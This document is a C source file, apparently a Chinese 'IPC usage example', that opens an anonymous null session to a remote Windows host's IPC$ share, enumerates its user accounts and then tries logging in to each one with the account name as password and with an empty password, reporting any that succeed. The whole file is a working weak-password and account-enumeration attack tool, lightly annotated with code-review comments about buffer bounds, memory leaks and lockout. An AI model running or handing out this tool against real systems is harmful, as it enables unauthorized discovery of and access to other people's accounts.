📄 用空用户及密码连接列用户表测试密码有.txt
/*
IPC的使用例子
用空用户及密码连接,列用户表,测试密码
*/
#include <windows.h>
#include <stdio.h>
#include <lm.h>
#include <assert.h>
#pragma comment(lib,"netapi32.lib")
#pragma comment(lib,"mpr.lib")
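/*
 * Forward declarations.
 *
 * EstablishNullSession adds (bEstablish = TRUE) or removes (FALSE) a
 * connection to \\Server\IPC$ using an empty user name, password and domain,
 * i.e. the equivalent of:  net use \\test\ipc$ "" /user:""
 * The return type is spelled out: the definition returns BOOL, and a
 * prototype without a type relies on implicit int, which C99 removed.
 */
BOOL EstablishNullSession(LPCWSTR Server, BOOL bEstablish);
int userlist(LPCWSTR Server);
int checkuser(void);

/* \\server\IPC$ path of the remote connection: UNC name + "\IPC$" + NUL. */
WCHAR RemoteResource[UNCLEN + 5 + 1];
/* Pointer to the user list that NetUserEnum returns (filled by userlist). */
LPUSER_INFO_20 pBuf;
/* Number of users in pBuf. */
DWORD sumuser = 0;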
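/*
 * Entry point. Expects exactly one argument, the target in \\Server form.
 * Opens a null session to it, lists its accounts, drops the null session and
 * then runs checkuser() over the collected list.
 *
 * Returns 0 when the null session could be opened, 1 on bad usage and -1 when
 * the null session was refused (the Win32 error code is printed).
 */
int wmain(int argc, wchar_t *argv[])
{
    if (argc != 2) {
        printf("Usage: %ls <\\\\Server>\n", argv[0]);
        printf("Usage: %ls \\\\192.168.11.4\n", argv[0]);
        return 1;
    }

    if (!EstablishNullSession(argv[1], TRUE)) {
        printf("Error establishing Null session! (rc=%lu)\n", GetLastError());
        return -1;
    }

    userlist(argv[1]);
    /* The anonymous connection is dropped before checkuser() reconnects to the
       same RemoteResource path under each enumerated account name. */
    EstablishNullSession(argv[1], FALSE);
    checkuser();

    /* NetUserEnum allocates the list; it has to be released with
       NetApiBufferFree once nothing reads it any more. */
    if (pBuf != NULL) {
        NetApiBufferFree(pBuf);
        pBuf = NULL;
        sumuser = 0;
    }
    return 0;
}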
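/*
 * Builds "\\<Server>\IPC$" in the global RemoteResource and then either adds
 * (bEstablish != FALSE) or deletes a use of that resource.
 *
 * When adding, user name, password and domain are all the empty string, which
 * is what makes the connection a "null session".
 * NOTE(review): whether the target accepts it depends on its anonymous-access
 * policy (the RestrictAnonymous family of settings); a refusal here is the
 * hardened outcome - confirm against the target's configuration.
 *
 * Server may be given with or without the leading "\\".
 * Returns TRUE on NERR_Success. On failure returns FALSE with the last error
 * set to ERROR_INVALID_COMPUTERNAME (bad name) or to the NetUseAdd/NetUseDel
 * status code.
 */
BOOL
EstablishNullSession(LPCWSTR Server, BOOL bEstablish)
{
    LPCWSTR szIpc = L"\\IPC$";
    DWORD cchServer;
    NET_API_STATUS nas;

    if (Server == NULL || *Server == L'\0') {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    cchServer = lstrlenW(Server);

    /* Only a name that really starts with two backslashes is treated as
       already prefixed. The previous test (first AND second character both
       differ from '\') also took the "prefixed" branch for names with a single
       backslash in either position and then subtracted 2 from the length. */
    if (Server[0] == L'\\' && Server[1] == L'\\') {
        cchServer -= 2; /* drop slashes from count */
        RemoteResource[0] = L'\0';
    } else {
        RemoteResource[0] = L'\\';
        RemoteResource[1] = L'\\';
        RemoteResource[2] = L'\0';
    }

    /* This bound is what keeps the two concatenations below inside
       RemoteResource (UNCLEN + 5 + 1 wide characters). An empty host part is
       rejected as well. */
    if (cchServer == 0 || cchServer > CNLEN) {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    if (lstrcatW(RemoteResource, Server) == NULL) return FALSE;
    if (lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;

    if (bEstablish) {
        USE_INFO_2 ui2;

        ZeroMemory(&ui2, sizeof(ui2));
        ui2.ui2_local = NULL;
        ui2.ui2_remote = (LPWSTR)RemoteResource;
        wprintf(L"rs=%s\n", RemoteResource);
        ui2.ui2_asg_type = USE_IPC;
        /* Empty credentials: this is the anonymous logon. */
        ui2.ui2_password = ui2.ui2_username = ui2.ui2_domainname = (LPWSTR)L"";
        nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
    } else {
        nas = NetUseDel(NULL, (LPWSTR)RemoteResource, 0);
    }

    if (nas == NERR_Success) return TRUE; /* indicate success */

    SetLastError(nas);
    return FALSE;
}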
/*
 * Requests the account list of Server at information level 20 (normal
 * accounts only) and stores it in the globals pBuf / sumuser, printing every
 * account name when the call returns NERR_Success.
 *
 * Always returns 1; any other status from NetUserEnum is silently ignored.
 * NOTE(review): over the anonymous session opened by the caller this is
 * expected to be denied on hosts that restrict anonymous SAM enumeration -
 * confirm. pBuf is allocated by NetUserEnum and is not freed here.
 */
int userlist(LPCWSTR Server)
{
    DWORD totalEntries = 0;
    DWORD resumeHandle = 0;
    NET_API_STATUS status;
    DWORD i;

    status = NetUserEnum(Server,
                         20,
                         FILTER_NORMAL_ACCOUNT,
                         (LPBYTE *)&pBuf,
                         0xFFFFFFFF, /* preferred maximum length of pBuf */
                         &sumuser,
                         &totalEntries,
                         &resumeHandle);
    if (status != NERR_Success)
        return 1;

    printf("user list!\n");
    for (i = 0; i < sumuser; i++)
        wprintf(L"name=%s\n", pBuf[i].usri20_name);

    return 1;
}
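/*
 * For every account collected in pBuf (sumuser entries) tries two IPC$
 * connections to RemoteResource: one with the password equal to the account
 * name and one with an empty password. A connection that succeeds is deleted
 * again straight away and the account is reported on stdout.
 *
 * Each NetUseAdd call is an authentication attempt against the remote host.
 * NOTE(review): the attempts are presumably recorded in the target's logon
 * auditing and count toward any account-lockout threshold - confirm.
 *
 * Always returns 1.
 */
int checkuser(void)
{
    NET_API_STATUS nass;
    USE_INFO_2 ui2;
    DWORD n;

    ZeroMemory(&ui2, sizeof(ui2));
    ui2.ui2_local = NULL;
    ui2.ui2_remote = (LPWSTR)RemoteResource;
    wprintf(L"rs=%s\n", RemoteResource);
    ui2.ui2_asg_type = USE_IPC;
    ui2.ui2_password = ui2.ui2_username = ui2.ui2_domainname = (LPWSTR)L"";

    /* Nothing was enumerated: there is no list to walk. */
    if (pBuf == NULL)
        return 1;

    for (n = 0; n < sumuser; n++) {
        /* The name is used straight from the enumeration buffer. The earlier
           code duplicated it twice per account with SysAllocString and never
           called SysFreeString, leaking both copies on every iteration. */
        LPWSTR name = pBuf[n].usri20_name;

        /* Attempt 1: password identical to the account name. */
        ui2.ui2_username = name;
        ui2.ui2_password = name;
        nass = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
        if (nass == NERR_Success) {
            NetUseDel(NULL, (LPWSTR)RemoteResource, 0);
            wprintf(L"name=%s password%s\n", name, name);
        }

        /* Attempt 2: empty password. */
        ui2.ui2_password = (LPWSTR)L"";
        nass = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
        if (nass == NERR_Success) {
            NetUseDel(NULL, (LPWSTR)RemoteResource, 0);
            printf("OK\n");
            /* This branch tested the empty password; the old message printed
               the account name as the password here, which was wrong. */
            wprintf(L"name=%s password is empty\n", name);
        }
    }
    return 1;
}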